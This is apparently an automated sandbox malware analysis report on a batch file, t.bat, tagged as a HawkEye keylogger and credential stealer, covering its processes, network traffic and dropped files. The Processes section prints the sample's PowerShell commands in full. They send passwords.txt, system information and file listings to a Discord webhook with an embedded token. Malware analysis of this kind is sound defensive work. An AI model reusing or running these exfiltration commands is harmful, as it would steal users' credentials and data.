Malware Analysis Report

2024-09-22 11:18

Sample ID 231113-z7k6gsfa5t
Target t.bat
SHA256 3a138a295230f132721473e396032bdd250158b6a1e45323cc520f5fe7985978
Tags
hawkeye keylogger spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3a138a295230f132721473e396032bdd250158b6a1e45323cc520f5fe7985978

Threat Level: Known bad

The file t.bat was found to be: Known bad.

Malicious Activity Summary

hawkeye keylogger spyware stealer trojan

HawkEye

Blocklisted process makes network request

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Gathers system information

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2023-11-13 21:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-13 21:21

Reported

2023-11-13 21:23

Platform

win10v2004-20231020-en

Max time kernel

74s

Max time network

69s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\t.bat"

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\t.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content passwords.txt)}"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content sysinfo.txt)}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content files.txt)}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 8.144.221.88.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 218.240.110.104.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 254.109.26.67.in-addr.arpa udp

Files

memory/1040-11-0x000002D359AE0000-0x000002D359B02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejj2rgeb.ncq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1040-16-0x00007FF86B010000-0x00007FF86BAD1000-memory.dmp

memory/1040-17-0x000002D341360000-0x000002D341370000-memory.dmp

memory/1040-18-0x000002D341360000-0x000002D341370000-memory.dmp

memory/1040-19-0x000002D341360000-0x000002D341370000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\passwords.txt

MD5 53b0ead48140091a196fafb6b8c5bb3c
SHA1 c6862512054f2de22087bfe539b9fa18e97db214
SHA256 57a3befee8f64369c40dfe1fb0b6df5792c8b68381e60d786b7432fb2a3cf662
SHA512 4f8e6514ea92ab08d950d2a00448f5f08f46d48112c632e0fcc504f7ea232b08f49db505751d949064df13a20a50e149034b78a17f45cd308fec1e472f7301cb

memory/1040-21-0x000002D35A740000-0x000002D35AEE6000-memory.dmp

memory/1040-25-0x00007FF86B010000-0x00007FF86BAD1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8a7f1bbb54d46317b10f8570930f1587
SHA1 a3622cd5ba47ff63381e1c8459dcdb822ae80b14
SHA256 19409fcc9d229fdc1fa59eb1b3beea2e031a76782261e3fdd0af6639f7111cac
SHA512 9c8c56c205ed32589c9ce80f10fe11986f238a722b3016e50e7677d60f190c7abe2fe445a9bdf2d192d8a9ab4f2e29528d5e179b2dca0c83668c3932858488c4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3d2dcde2b92ddc1caedbe3dcc9efc114
SHA1 e149ab0853f59539a6993d1727e7f29834c3a548
SHA256 3c598ecbf86eb6c3f992e35bbcd69e354cfb1f9caf0c436cd7acabac111d96c6
SHA512 662fd6ec00495373f8fbe821badaacf0c35e27243fd2d640e908ef913a0725f92f2379fc34d42653930463425cd8a290c8981cb658e155f10bc928ce84201ba4

memory/3948-38-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp

memory/3948-40-0x00000267E8AF0000-0x00000267E8B00000-memory.dmp

memory/3948-39-0x00000267E8AF0000-0x00000267E8B00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

MD5 a9812d5ea5001324a17895f4ec2bb47c
SHA1 054e0b9eedcb1264ace23dbf239818244fdafb4f
SHA256 8907893d54ea7f5fea57bbca52fdde5d14b6517a0b8e745d78758667b469ae5e
SHA512 2677628779d1766bb84a736034cf8bbf0bd464adcadf41d1e94b5abfa0174aa7eb3a50d8a93748f7b55378df6ed13fed0cb2ea50d69736faeb146faf6f74c559

memory/3948-44-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp

memory/3916-55-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp

memory/3916-57-0x0000025177D90000-0x0000025177DA0000-memory.dmp

memory/3916-56-0x0000025177D90000-0x0000025177DA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 87addc59846b16b4a3c182e16ace9b84
SHA1 572ba04171b1f9d893f43f8c72800393b133161a
SHA256 abcdce53e9e05fd1009fa1a97af43f4471b3a408af5e51a1e5baa091a36ae5f0
SHA512 b5f2214bf9fe99cb9a6eda901b102bb46c9843a398d72154ff6943cec2d53defa9e7026002f80c29ea1ad0de5864aae91e8cb2b9a0426842d0d6299b87d2f18e

C:\Users\Admin\AppData\Local\Temp\files.txt

MD5 f31c3f34c03c7016c72b9355e02bceeb
SHA1 79ecb50628fef47b8b4518e624de4b241011da32
SHA256 ab9afd4963e85b01ab48cd37e7ebec4c3e496640a72976e5ec5529f5b92b1f8d
SHA512 abf53be628382272dbb0e75085e36ac1cc0d8c215ac4a27b2d1fe1e8647df03feaa60486a3068eae0d54c1d61256293536f59f335fe4ed55ce479aa5d9ddd679

memory/3916-62-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp